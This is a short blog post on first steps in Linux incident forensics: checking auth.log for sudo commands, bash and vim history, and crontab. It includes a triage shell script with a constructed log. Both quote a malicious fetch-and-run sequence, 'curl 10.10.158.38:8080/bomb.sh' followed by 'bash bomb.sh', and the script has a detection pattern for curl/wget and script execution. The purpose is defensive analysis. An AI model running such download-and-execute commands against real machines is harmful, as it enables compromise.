Incident Forensics - Kali Linux Tips

Paulo Bazzo

What are the first steps?

We are going over some of the first things you should check when examining a computer for traces an attacker might have forgotten to hide. After all, there is no perfect crime.

Edit the Sudoers file

The sudoers file keeps all the information about the SUDOERS (who may run what through sudo). The visudo command below is the safe way to edit it: it provides basic sanity checks and checks for parse errors before saving. If the sudoers file is currently being edited by someone else, you will receive a message to try again later.

Sudoers File Location

/usr/sbin/visudo                  

Checking .log files

We can perform an in-depth search on the system by examining the auth.log file. This file keeps track of logins and other authentication events, including the commands and applications that were run through sudo during a session. It's a good place to start when doing forensic analysis on a machine.

cat /var/log/auth.log*

Use the grep command to select specific lines of the file.

cat /var/log/auth.log* | grep -i COMMAND

With grep we are asking for the lines that contain the word "COMMAND". The -i flag makes the match case insensitive. It's also a good idea to search for executables that were run, such as .sh, .py and .php files.
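As an added example (not part of the original post), the POSIX shell functions below turn the grep above into a small triage helper: they pull the user, working directory and command out of every sudo COMMAND line in an auth.log-style file, flag the entries that fetch or run .sh/.py/.php files, and count denied sudo attempts. The log lines are a constructed sample, not output from a real machine.

```shell
#!/bin/sh
# Added example: triage sudo COMMAND entries from auth.log-format input.
# The log below is a constructed sample, not from a real system.
SAMPLE_LOG="$(mktemp)"
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
Mar 12 10:14:59 kali sshd[1234]: Accepted password for bob from 10.10.158.38 port 54321 ssh2
Mar 12 10:15:01 kali sudo:      bob : TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/apt update
Mar 12 10:15:40 kali sudo:      bob : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/curl 10.10.158.38:8080/bomb.sh --output bomb.sh
Mar 12 10:15:52 kali sudo:      bob : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/bash bomb.sh
Mar 12 10:16:10 kali sudo:      bob : command not allowed ; TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/crontab -e
EOF

# Print one line per sudo COMMAND entry as  user|working-dir|command
# Rotated logs work too:  sudo_commands /var/log/auth.log*
sudo_commands() {
  grep -h 'sudo:.*COMMAND=' "$@" |
    sed -E 's/^.* sudo: +([^ ]+) : .*PWD=([^;]*) ; .*COMMAND=(.*)$/\1|\2|\3/'
}

# Keep only entries that fetch or execute script files (.sh/.py/.php)
# or call curl/wget, the indicators the post suggests grepping for.
suspicious_sudo_commands() {
  sudo_commands "$@" | grep -Ei '\.(sh|py|php)( |$)|/(curl|wget) '
}

# Count sudo requests that the sudoers policy refused.
denied_sudo_count() {
  grep -hc 'sudo:.*command not allowed' "$@"
}

echo "== all sudo commands =="
sudo_commands "$SAMPLE_LOG"
echo "== suspicious =="
suspicious_sudo_commands "$SAMPLE_LOG"
echo "denied sudo attempts: $(denied_sudo_count "$SAMPLE_LOG")"
```

Point the functions at /var/log/auth.log* on the machine under examination to get the same three views over the real log.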

Check the Command History

Every user has a .bash_history file inside their home directory; use this file to investigate the commands that user ran. Sometimes an individual might have compromised more than one account, so we should be mindful that they could download a payload with account X and execute it with account Y.

In this example, this is the command we found to be malicious in our analysis:

curl 10.10.158.38:8080/bomb.sh --output bomb.sh

The command above goes to the specified file location hosted by the IP address, connecting on port 8080, and downloads the file to disk using --output.

Vim History

Vim is a text editor that we can use from inside the Linux terminal; it also holds historical information that can be useful during incident forensics. Check the following file, usually located inside the home directory of the user. At the top of the file there will be information on where the edited files were saved.

.viminfo

Scheduled Tasks

Malicious files will often be set up to be executed as a scheduled task. We can run the following to check all scheduled tasks on the system.

cat /etc/crontab

To understand the date and time at which the job will run, we can use a website like Crontab.guru to translate the crontab schedule (the HOUR:MINUTE fields) into human-readable form.

Summary

In this blog post we went through some of the first steps we could take when examining a potentially compromised machine.
This blog post will be updated periodically with more information, and will be used as a repository for information and quick access to short commands.